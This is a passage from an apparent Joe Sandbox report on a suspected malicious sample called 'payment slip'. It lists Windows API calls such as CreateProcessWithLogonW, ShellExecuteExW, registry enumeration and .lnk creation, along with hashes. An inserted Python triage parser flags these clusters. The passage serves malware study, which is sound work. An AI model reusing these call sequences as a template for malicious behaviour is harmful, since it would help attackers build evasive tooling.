                                        • Opcode Fuzzy Hash: 6b0d941d3c7f69c40bb0f3571511f669e80d2f5294a75253e32957096004bec6
                                        • Instruction Fuzzy Hash: E3210476205200BBFF655B29ED49E7F7BD8DF45750F108039F809CA192EA75CC42A6A0
                                        APIs
                                          • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                        • _wcslen.LIBCMT ref: 000A587B
                                        • CoInitialize.OLE32(00000000), ref: 000A5995
                                        • CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A59AE
                                        • CoUninitialize.OLE32 ref: 000A59CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 3172280962-24824748
                                        • Opcode ID: d8f0e2c173a8407b7911d779ff82c73e2a62ab2aa10b8e4a9438bbb2b7cb37dd
                                        • Instruction ID: e5a5d98775eef7b89711e8b605d24676225dbd06c237bf0208f07ba436b9074d
                                        • Opcode Fuzzy Hash: d8f0e2c173a8407b7911d779ff82c73e2a62ab2aa10b8e4a9438bbb2b7cb37dd
                                        • Instruction Fuzzy Hash: EBD173756087019FC714DF64C880A6ABBE5FF8A712F14885DF8899B362DB31EC45CB92
                                        APIs
                                          • Part of subcall function 00090FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00090FCA
                                          • Part of subcall function 00090FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00090FD6
                                          • Part of subcall function 00090FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00090FE5
                                          • Part of subcall function 00090FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00090FEC
                                          • Part of subcall function 00090FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00091002
                                        • GetLengthSid.ADVAPI32(?,00000000,00091335), ref: 000917AE
                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000917BA
                                        • HeapAlloc.KERNEL32(00000000), ref: 000917C1
                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 000917DA
                                        • GetProcessHeap.KERNEL32(00000000,00000000,00091335), ref: 000917EE
                                        • HeapFree.KERNEL32(00000000), ref: 000917F5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                        • String ID:
                                        • API String ID: 3008561057-0
                                        • Opcode ID: ce6b420bc5b2197d253a9f286765d9465857605c13af4b8b7097f30153f19abe
                                        • Instruction ID: 571de6aa6e5702d74064996e85e3836c0b7797af20140c2c6ee086486bb4977c
                                        • Opcode Fuzzy Hash: ce6b420bc5b2197d253a9f286765d9465857605c13af4b8b7097f30153f19abe
                                        • Instruction Fuzzy Hash: 57119A32604206EFEF109FA5CC49FEEBBB9EB42355F144058F84597220C739A940EB60
                                        APIs
                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000914FF
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00091506
                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00091515
                                        • CloseHandle.KERNEL32(00000004), ref: 00091520
                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0009154F
                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00091563
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                        • String ID:
                                        • API String ID: 1413079979-0
                                        • Opcode ID: ebd549cd64be38eda69fdd15b5c56242c558374d07258c81bdb7fec0affbd9d5
                                        • Instruction ID: e0e0519a718c4bcd2fdf7093feaa0ee62edd3b42f16e3935530ea7ca74711e36
                                        • Opcode Fuzzy Hash: ebd549cd64be38eda69fdd15b5c56242c558374d07258c81bdb7fec0affbd9d5
                                        • Instruction Fuzzy Hash: 8D11297260024AEBEF118F98ED49FDE7BA9FF48744F154115FA09A2060C375CE61EB60
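The function records in this report all share one layout: bullet lines of `Api.MODULE(args), ref: address`, indented `Part of subcall function` lines for callees, then `Similarity` fields (`API ID`, `String ID`). Three of the records above are worth a second look during triage: the `RegConnectRegistryW`/`RegEnumValueW` routine, the `CoCreateInstance` routine whose String ID is `.lnk`, and the `OpenProcessToken`/`CreateProcessWithLogonW` routine just listed. The Python below is an added example, not code from the Joe Sandbox report, the IDA plugin or the sample: it parses that record format and flags API clusters that match a small set of capability rules. The record text is copied from the entries above (a few subcall lines omitted); the rule names, the rule set and the `triage()` helper are this example's own assumptions. One caveat that is also an assumption rather than something the report states: since the sample is flagged as a compiled AutoIt script, these routines are most likely the AutoIt interpreter's own runtime (RunAs, RegRead, FileCreateShortcut) rather than script-specific code, so a hit means "inspect", not "malicious".

```python
"""Parse Joe Sandbox per-function API listings and flag capability clusters.

Added example, not code from the Joe Sandbox report or from the analysed
sample.  RECORDS is copied from three function entries in the report; the
capability rules and labels are this example's own assumptions.
"""
import re

# Three function records copied from the report's API listings
# (some "Part of subcall function" lines omitted for brevity).
RECORDS = """
APIs
  • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
  • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBCCA
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBD25
• RegCloseKey.ADVAPI32(00000000), ref: 000BBD6A
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000BBD99
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
APIs
• _wcslen.LIBCMT ref: 000A587B
• CoInitialize.OLE32(00000000), ref: 000A5995
• CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A59AE
• CoUninitialize.OLE32 ref: 000A59CC
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000914FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00091506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00091515
• CloseHandle.KERNEL32(00000004), ref: 00091520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0009154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00091563
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
"""

# One API line: optional subcall prefix, Name.MODULE, optional (args), ref: addr.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>API ID|String ID):\s*(?P<val>.*)$")

# Capability rules (assumed, not from the report): label, direct-call API
# names that must all be present, and an optional substring of String ID.
RULES = [
    ("run-as-other-user", {"OpenProcessToken", "CreateProcessWithLogonW"}, None),
    ("registry-enumeration", {"RegConnectRegistryW", "RegEnumValueW"}, None),
    ("shortcut-creation", {"CoCreateInstance"}, ".lnk"),
]


def parse_records(text):
    """Split the listing at each 'APIs' header and parse the calls and fields."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = {"calls": [], "api_id": "", "string_id": ""}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            cur["calls"].append({
                "name": m.group("name"),
                "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref"),
                "subcall": m.group("parent") is not None,  # callee, not this function
                "parent": m.group("parent"),
            })
            continue
        f = FIELD_RE.match(line)
        if f:
            key = "api_id" if f.group("key") == "API ID" else "string_id"
            cur[key] = f.group("val").strip()
    return records


def flag(record):
    """Return the rule labels whose API set is fully present among direct calls."""
    direct = {c["name"] for c in record["calls"] if not c["subcall"]}
    hits = []
    for label, apis, needle in RULES:
        if apis <= direct and (needle is None or needle in record["string_id"]):
            hits.append(label)
    return hits


def triage(text):
    """Map the address of each flagged function's first direct call to its labels."""
    out = {}
    for rec in parse_records(text):
        first = next((c for c in rec["calls"] if not c["subcall"]), None)
        if first is not None and flag(rec):
            out[first["ref"]] = flag(rec)
    return out


if __name__ == "__main__":
    for ref, labels in triage(RECORDS).items():
        print(f"{ref}: {', '.join(labels)}")
```

Run against the three records it prints one line per function with the rule labels that matched; feed it the full "APIs" section of a report to get a list of functions to open in the IDA snapshot first. The rules key on direct calls only, because a `Part of subcall function` line describes a callee that many unrelated functions share (`_wcslen`, `CharUpperBuffW`), and counting it would flag every caller.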
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00053379,00052FE5), ref: 00053390
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0005339E
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000533B7
                                        • SetLastError.KERNEL32(00000000,?,00053379,00052FE5), ref: 00053409
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: bba0d9b5e0e3d4cbc6841b41330d0b4aacb987d327acfa27051ab1c8ec5e2ba5
                                        • Instruction ID: cea13594802ff829677e8b4cf21a98ea1902eabdaf47cef0922292eaa048adc5
                                        • Opcode Fuzzy Hash: bba0d9b5e0e3d4cbc6841b41330d0b4aacb987d327acfa27051ab1c8ec5e2ba5
                                        • Instruction Fuzzy Hash: 7801F532609315AEF72527747D8ADA72A94DB053FB320422DFD10851F1EF154E0AA548
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00065686,00073CD6,?,00000000,?,00065B6A,?,?,?,?,?,0005E6D1,?,000F8A48), ref: 00062D78
                                        • _free.LIBCMT ref: 00062DAB
                                        • _free.LIBCMT ref: 00062DD3
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0005E6D1,?,000F8A48,00000010,00034F4A,?,?,00000000,00073CD6), ref: 00062DE0
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0005E6D1,?,000F8A48,00000010,00034F4A,?,?,00000000,00073CD6), ref: 00062DEC
                                        • _abort.LIBCMT ref: 00062DF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: dabe36bb641a8daab7fb1edea3764177573c8ef941e688e46bc8625d1d72cedd
                                        • Instruction ID: d2e89997e129d24fcf63bf3b3af217df9c8b94417d26b27c0d4dbfc57664b319
                                        • Opcode Fuzzy Hash: dabe36bb641a8daab7fb1edea3764177573c8ef941e688e46bc8625d1d72cedd
                                        • Instruction Fuzzy Hash: D9F0C831A05E0127E2622734BC16EAE259BAFC27A1F260418F928961D3EF2889015270
                                        APIs
                                          • Part of subcall function 00049639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                          • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496A2
                                          • Part of subcall function 00049639: BeginPath.GDI32(?), ref: 000496B9
                                          • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496E2
                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 000C8A4E
                                        • LineTo.GDI32(?,00000003,00000000), ref: 000C8A62
                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 000C8A70
                                        • LineTo.GDI32(?,00000000,00000003), ref: 000C8A80
                                        • EndPath.GDI32(?), ref: 000C8A90
                                        • StrokePath.GDI32(?), ref: 000C8AA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: 6c45bd2f41d66901de25dfc1eede3655f0d6fd0f654db478d29bc16650242590
                                        • Instruction ID: 37bc52b5127a5d8e3340a82d4ea5b1a9e91207618819996dcb33d18f6d579dd7
                                        • Opcode Fuzzy Hash: 6c45bd2f41d66901de25dfc1eede3655f0d6fd0f654db478d29bc16650242590
                                        • Instruction Fuzzy Hash: 38110576400108FFEB129F90DC88EAA7FACEB08354F048426FA599A1A1C7759D95DFA0
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00095218
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00095229
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00095230
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00095238
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0009524F
                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00095261
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: 58386c49cd1928ab9c6fe79766913985956c79141d07f3ab96a990cef36f62f0
                                        • Instruction ID: edf96cbd0c39c1b155ecddcd1aa4c1bfda6ab6dc44ba9fe89e4bc84296aea43d
                                        • Opcode Fuzzy Hash: 58386c49cd1928ab9c6fe79766913985956c79141d07f3ab96a990cef36f62f0
                                        • Instruction Fuzzy Hash: BE018475A01704BBFF105BA6DC49E5EBFB8FF44351F044065FA08A7291D6709800CB60
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00031BF4
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00031BFC
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00031C07
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00031C12
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00031C1A
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00031C22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: a9f242545921ae80d2b34ba0c21787a4405b1a36686a66d0a18deddde3371c08
                                        • Instruction ID: c994b5c1d497d3badb4c738d8099a54303410683415b32105acff3db0e0d8823
                                        • Opcode Fuzzy Hash: a9f242545921ae80d2b34ba0c21787a4405b1a36686a66d0a18deddde3371c08
                                        • Instruction Fuzzy Hash: 5A0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C4BA42C7F5A864CBE5
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0009EB30
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0009EB46
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0009EB55
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB64
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB6E
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: 62333c02c6702ca1f5b4d46bd6110d6e573db820fbb1e590ad075e1d1413b195
                                        • Instruction ID: 71825f32cf350f8b7d3d547511659a5db09fbaa9b29554a8494b1c13ba8944ae
                                        • Opcode Fuzzy Hash: 62333c02c6702ca1f5b4d46bd6110d6e573db820fbb1e590ad075e1d1413b195
                                        • Instruction Fuzzy Hash: 7EF01772640158BBF7215B62DD0EEAB3A7CEBCAB15F000158FA05D109197A85A0186B5
                                        APIs
                                        • GetClientRect.USER32(?), ref: 00087452
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00087469
                                        • GetWindowDC.USER32(?), ref: 00087475
                                        • GetPixel.GDI32(00000000,?,?), ref: 00087484
                                        • ReleaseDC.USER32(?,00000000), ref: 00087496
                                        • GetSysColor.USER32(00000005), ref: 000874B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                        • String ID:
                                        • API String ID: 272304278-0
                                        • Opcode ID: 7d608743df47ba7620da86117da3cdd53f12d0eea6d2686c326672f6d2d8b28e
                                        • Instruction ID: 6f45634a6fb610d7caa3f9d0d4593984f6dc47b25b5cf0a9e167fa47ee43c963
                                        • Opcode Fuzzy Hash: 7d608743df47ba7620da86117da3cdd53f12d0eea6d2686c326672f6d2d8b28e
                                        • Instruction Fuzzy Hash: FA018B31400615EFFB50AFA4DC08FAE7BB5FB04321F240064F959A20A1CB355E82AB10
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0009187F
                                        • UnloadUserProfile.USERENV(?,?), ref: 0009188B
                                        • CloseHandle.KERNEL32(?), ref: 00091894
                                        • CloseHandle.KERNEL32(?), ref: 0009189C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 000918A5
                                        • HeapFree.KERNEL32(00000000), ref: 000918AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                        • String ID:
                                        • API String ID: 146765662-0
                                        • Opcode ID: facb89ec12ab216342231937769491057db082d3d679a02333b643408e72092b
                                        • Instruction ID: f036e55c47305fb57bc45ca9b0e81be0344b669963981dadb8502f2afb96e6b0
                                        • Opcode Fuzzy Hash: facb89ec12ab216342231937769491057db082d3d679a02333b643408e72092b
                                        • Instruction Fuzzy Hash: 9BE01A36404501BFFB015FA2ED0CD0ABF39FF4AB22B108220F62981470CB369420DF50
                                        APIs
                                          • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0009C6EE
                                        • _wcslen.LIBCMT ref: 0009C735
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0009C79C
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0009C7CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info_wcslen$Default
                                        • String ID: 0
                                        • API String ID: 1227352736-4108050209
                                        • Opcode ID: beeef74ba9599ebf33af42cf76b90622784205630c956e6d80e372af280e0d39
                                        • Instruction ID: f4bc7ad02b7b4d24b936be140614355d17619289acdbf9383f24fae1fecd539e
                                        • Opcode Fuzzy Hash: beeef74ba9599ebf33af42cf76b90622784205630c956e6d80e372af280e0d39
                                        • Instruction Fuzzy Hash: 66510371A083019BEB509F68C885FABB7E8AF49314F04092DF995D31E1DB74D904EB52
                                        APIs
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 000BAEA3
                                          • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                        • GetProcessId.KERNEL32(00000000), ref: 000BAF38
                                        • CloseHandle.KERNEL32(00000000), ref: 000BAF67
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                        • String ID: <$@
                                        • API String ID: 146682121-1426351568
                                        • Opcode ID: 8c46d4925fbfd18b2ca66ab63ebf854d327496781cca8d466fffe2a1c8975716
                                        • Instruction ID: 5c34fd495a52dcafe86060aeff5ac585d7d4828d51d0938e65d4d78c4b78a461
                                        • Opcode Fuzzy Hash: 8c46d4925fbfd18b2ca66ab63ebf854d327496781cca8d466fffe2a1c8975716
                                        • Instruction Fuzzy Hash: 46715571A00619DFCB15DF94C484ADEBBF4BF09314F0484A9E85AAB3A2CB74ED45CB91
                                        APIs
                                        • GetWindowRect.USER32(00E1E670,?), ref: 000C62E2
                                        • ScreenToClient.USER32(?,?), ref: 000C6315
